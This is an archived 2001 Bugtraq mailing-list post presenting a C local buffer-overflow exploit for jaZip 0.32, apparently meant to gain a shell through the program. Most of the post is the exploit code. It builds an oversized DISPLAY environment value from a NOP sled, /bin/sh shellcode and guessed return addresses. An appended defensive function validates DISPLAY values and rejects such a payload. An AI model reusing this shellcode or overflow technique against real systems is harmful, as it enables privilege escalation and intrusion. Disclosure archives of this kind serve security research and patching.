Bugtraq mailing list archives
jazip 0.32 local exploit
From: n33dl3r <n33dl3r () HOTMAIL COM>
Date: Fri, 26 Jan 2001 01:05:42 -0000
Hi folks! In between heavy gaming I dished up this tiny exploit for jaZip! Educational purposes only. Please don't abuse. Hi mum, gimme some food damnit!

-- [snip - jazip-exp.c] --

```c
/*
 * jaZip-0.32 local buffer overflow exploit (tested on debian)
 *
 * usage is: ./jazip-exp <offset> <align>
 *   offset: 1500 x N (where N is positive or negative number)
 *   align:  1-3 (0 is def.)
 *
 * This exploit is heavily broken, to prevent scriptkiddie abuse!
 * Thanks to d-blood for helping me with the shellcode.
 *
 * c0ded by: needler @ efnet <n33dl3r () hotmail com>
 *
 * Oh btw.. fuck college, I'm gonna be a pro CS player.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, memcpy, strlen */
#include <sys/types.h>   /* u_long */

#define BSIZE 2080
#define NOPS  1500

char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

int main(int argc, char **argv, char **envp)
{
    char overflow[BSIZE];
    int i, align = 0, offset = 0;
    u_long addy = 0xbffff9e5;

    if (argc > 1)
        offset = atoi(argv[1]);
    if (argc > 2)
        align = atoi(argv[2]);

    /* NOP sled, then shellcode, with "DISPLAY=" written over the start */
    memset(overflow, 0x90, BSIZE);
    memcpy(&overflow[NOPS], shellcode, strlen(shellcode));
    memcpy(overflow, "DISPLAY=", 8);

    /* fill the remainder with the guessed return address */
    for (i = (NOPS + strlen(shellcode)); i < BSIZE; i += 4)
        *(long *)&overflow[i + align] = addy + offset;

    envp[0] = overflow;
    printf("Using address 0x%lx\n", addy + offset);

    // execl("/usr/X11R6/bin/jazip", "jazip", NULL);
}
```

-- [snip - jazip-exp.c] --

Terrorists win! (damn I lub CS)

--- yours truly, needler
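A defensive counterpart, added here and not part of needler's post or of jaZip itself: a length and syntax check on a DISPLAY value before it is ever copied into a fixed-size buffer, which rejects an oversized value of the shape constructed above. The DISPLAY_MAX limit, the simplified display-name grammar and the function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DISPLAY_MAX 255   /* assumed limit; real display names are far shorter */

/* Return 1 if s looks like a well-formed X display name ("host:N" or
 * "host:N.M", host optional), 0 otherwise. Length is bounded first, so
 * an oversized value is rejected before anything is copied anywhere. */
int validate_display(const char *s)
{
    size_t len = 0, i;
    if (s == NULL)
        return 0;
    while (len <= DISPLAY_MAX && s[len] != '\0')
        len++;
    if (len == 0 || len > DISPLAY_MAX)
        return 0;
    /* host part: letters, digits, '.' and '-' only, up to the colon */
    for (i = 0; s[i] != ':'; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '\0' || !(isalnum(c) || c == '.' || c == '-'))
            return 0;
    }
    i++;                                   /* skip ':' */
    if (!isdigit((unsigned char)s[i]))     /* display number required */
        return 0;
    while (isdigit((unsigned char)s[i]))
        i++;
    if (s[i] == '.') {                     /* optional ".screen" */
        i++;
        if (!isdigit((unsigned char)s[i]))
            return 0;
        while (isdigit((unsigned char)s[i]))
            i++;
    }
    return s[i] == '\0';
}

/* Constructed sample: a 2072-byte value of 0x90 bytes, the shape of the
 * NOP sled in the post above. Returns 1 when validate_display rejects it. */
int oversized_value_rejected(void)
{
    char payload[2073];
    memset(payload, 0x90, sizeof payload - 1);
    payload[sizeof payload - 1] = '\0';
    return validate_display(payload) == 0;
}
```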
Current thread:
- jazip 0.32 local exploit n33dl3r (Jan 26)
- Re: jazip 0.32 local exploit Peter S Galbraith (Jan 29)